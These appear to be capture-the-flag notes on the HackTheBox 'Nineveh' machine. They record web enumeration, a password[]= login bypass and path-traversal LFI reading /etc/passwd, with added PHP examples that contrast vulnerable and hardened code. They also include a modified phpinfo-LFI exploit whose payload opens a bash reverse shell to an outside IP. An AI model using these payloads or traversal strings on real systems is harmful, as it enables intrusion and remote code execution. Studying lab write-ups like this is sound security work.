2 :80

:80 :443 in parallel 

http://nineveh.htb/
It works!
| splash page

$ gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100
===============================================================
/info.php             (Status: 200) [Size: 83687]
/index.html           (Status: 200) [Size: 178]
/department           (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]

http://nineveh.htb/info.php
PHP Version 7.0.18-0ubuntu0.16.04.1
System 	Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 
Loaded Configuration File 	/etc/php/7.0/apache2/php.ini 
Server Root 	/etc/apache2 
DOCUMENT_ROOT 	/var/www/html 
file_uploads	On

http://nineveh.htb/department/ > http://nineveh.htb/department/login.php
login page
# view-source
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->

$ gobuster dir -u http://nineveh.htb/department/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100
===============================================================
/header.php           (Status: 200) [Size: 670]
/footer.php           (Status: 200) [Size: 51]
/files                (Status: 301) [Size: 321] [--> http://nineveh.htb/department/files/]
/login.php            (Status: 200) [Size: 1560]
/index.php            (Status: 200) [Size: 68]
/css                  (Status: 301) [Size: 319] [--> http://nineveh.htb/department/css/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/manage.php           (Status: 302) [Size: 0] [--> login.php]
# all redirect to login.php

# default admin:admin fails
# but user enum is possible

admin:admin => Invalid Password!
amrois:amrois => invalid username

# tried auth-bypass/sqli.txt  - nothing.
# tried manual sqli to find columns - nothing.
# tried changing password=password => password[]= in burp
# works > http://nineveh.htb/department/manage.php
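Why `password[]=` gets past a hardcoded check, and what the fixed login looks like, as an added PHP example (not the box's login.php, whose source is not shown; the loose `strcmp()` comparison is assumed from the behaviour above, and the credential values are placeholders):

```php
<?php
// Added example, not the box's login.php (its source is not shown). The
// vulnerable check below is an ASSUMPTION that fits the observed behaviour:
// a hardcoded credential pair compared with strcmp() under loose (==) comparison.
const HARDCODED_USER = 'admin';              // assumed from the note in ninevehNotes.txt
const HARDCODED_PASS = 'placeholder-secret'; // placeholder, not the box's password

// Vulnerable (PHP 7.x): strcmp() given an array emits a warning and returns
// NULL, and NULL == 0 is true, so "password[]=" passes without the password.
// PHP 8 turns this into a TypeError, which is a crash rather than a bypass.
function login_vulnerable(array $post)
{
    if (!isset($post['username'], $post['password'])) {
        return 'invalid username';
    }
    if ($post['username'] !== HARDCODED_USER) {
        return 'invalid username';           // distinct message leaks valid usernames
    }
    if (@strcmp($post['password'], HARDCODED_PASS) == 0) {
        return 'ok';
    }
    return 'Invalid Password!';
}

// Hardened: reject non-string input before any comparison, keep hashes rather
// than plaintext, and return one message for every failure so that usernames
// cannot be enumerated the way admin/amrois were above.
function login_hardened(array $post, array $users)
{
    $u = isset($post['username']) ? $post['username'] : null;
    $p = isset($post['password']) ? $post['password'] : null;
    if (!is_string($u) || !is_string($p)) {
        return 'Invalid username or password';
    }
    // $users maps username => password_hash() output (constructed in the demo below).
    $hash = isset($users[$u]) ? $users[$u] : null;
    if ($hash === null || !password_verify($p, $hash)) {
        return 'Invalid username or password';
    }
    return 'ok';
}

// What PHP parses "username=admin&password[]=" into (constructed input).
$bypass = ['username' => 'admin', 'password' => ['']];
$users  = ['admin' => password_hash(HARDCODED_PASS, PASSWORD_DEFAULT)]; // constructed

echo login_vulnerable($bypass), "\n";
echo login_hardened($bypass, $users), "\n";
```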

http://nineveh.htb/department/manage.php
logged in as admin
| notes section

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt
Have you fixed the login page yet! hardcoded username and password is really bad idea!
check your serect folder to get in! figure it out! this is your challenge
Improve the db interface.
~amrois
# failed LFI using http://nineveh.htb/department/manage.php?notes=../../../../../../etc/passwd
# failed LFI http://nineveh.htb/department/manage.php?notes=files/../../../etc/passwd

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes/etc/passwd
Warning:  include(files/ninevehNotes/etc/passwd): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31

# we are in /var/www/html/department
# no such file or directory 
# removing ninevehnotes/
http://nineveh.htb/department/manage.php?notes=files/../../../../etc/passwd
No Note is selected

# the error was helpful, so adding ninevehNotes back and removing files/
# we get LFI
http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash

# also works http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../etc/passwd
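The filter reconstructed from the responses above, beside a path-confined version, as an added PHP example (not the box's manage.php; the substring check is an assumption that fits the observed messages, and NOTES_DIR is taken from the working notes= URL):

```php
<?php
// Added example, not the box's manage.php (its source is not shown). The
// vulnerable filter is an ASSUMPTION reconstructed from the responses above:
// no "ninevehNotes" in the parameter gives "No Note is selected", anything
// containing it is handed to include().
const NOTES_DIR = '/var/www/html/department/files'; // from the working notes= URL

// Vulnerable: a substring check is not a path check. PHP normalises the path
// itself before opening it, so "/ninevehNotes.txt/../../../../etc/passwd"
// is read although no /ninevehNotes.txt exists, exactly as seen above.
function notes_vulnerable($notes)
{
    if (!is_string($notes) || strpos($notes, 'ninevehNotes') === false) {
        return 'No Note is selected';
    }
    ob_start();
    include $notes;           // include() also executes any PHP found in the file
    return ob_get_clean();
}

// Hardened: accept only a bare .txt filename, resolve it on disk, confirm the
// resolved path is inside NOTES_DIR, and read it as data rather than include it.
function notes_hardened($notes)
{
    if (!is_string($notes) || !preg_match('/\A[A-Za-z0-9_-]+\.txt\z/', $notes)) {
        return 'No Note is selected';          // rejects "/", "..", NUL bytes, "php://"
    }
    $base = realpath(NOTES_DIR);
    $path = realpath(NOTES_DIR . '/' . $notes);
    // realpath() is false for a missing file and follows symlinks, so a link
    // planted in files/ that points elsewhere fails the prefix check too.
    if ($base === false || $path === false
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return 'No Note is selected';
    }
    return htmlspecialchars(file_get_contents($path), ENT_QUOTES, 'UTF-8');
}

echo notes_hardened(isset($_GET['notes']) ? $_GET['notes'] : '');
```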

# as file_uploads is On, testing LFI + phpinfo() = RCE.

# capturing info.php via burp
# changing GET, Content-Type and data

POST /info.php HTTP/1.1
Host: nineveh.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------7db268605ae
Content-Length: 194

-----------------------------7db268605ae
Content-Disposition: form-data; name="dummyname"; filename="test.txt"
Content-Type: text/plain

Security
Test
-----------------------------7db268605ae

# response
<h2>PHP Variables</h2>
<table>
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">$_FILES['dummyname']</td><td class="v"><pre>Array
(
    [name] =&gt; test.txt
    [type] =&gt; 
    [tmp_name] =&gt; 
    [error] =&gt; 3
    [size] =&gt; 0
)

# no tmp_name? weird?

# still running exploit to check

# added on top
local_ip="10.10.16.7"
local_port=443
phpsessid="mq5puchlsho4m8r1u0q2m3tl30"

# modified payload
PAYLOAD="""%s\r <?php system("bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'");?>\r""" % (TAG, local_ip, local_port)

# modified request location and added Cookie
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30; othercookie="""+padding+"""\r

# modified LFIREQ; added cookie as we need to be logged in to access that page
LFIREQ="""GET /department/manage.php?notes=/ninevehNotes/..%s HTTP/1.1\r
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30\r

# changed => to =&gt (notes)

$ python phpinfolfi.py 10.10.10.43 80 100
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... Traceback (most recent call last):
  File "phpinfolfi.py", line 201, in <module>
    main()
  File "phpinfolfi.py", line 161, in main
    offset = getOffset(host, port, reqphp)
  File "phpinfolfi.py", line 120, in getOffset
    raise ValueError("No php tmp_name in phpinfo output")
ValueError: No php tmp_name in phpinfo output
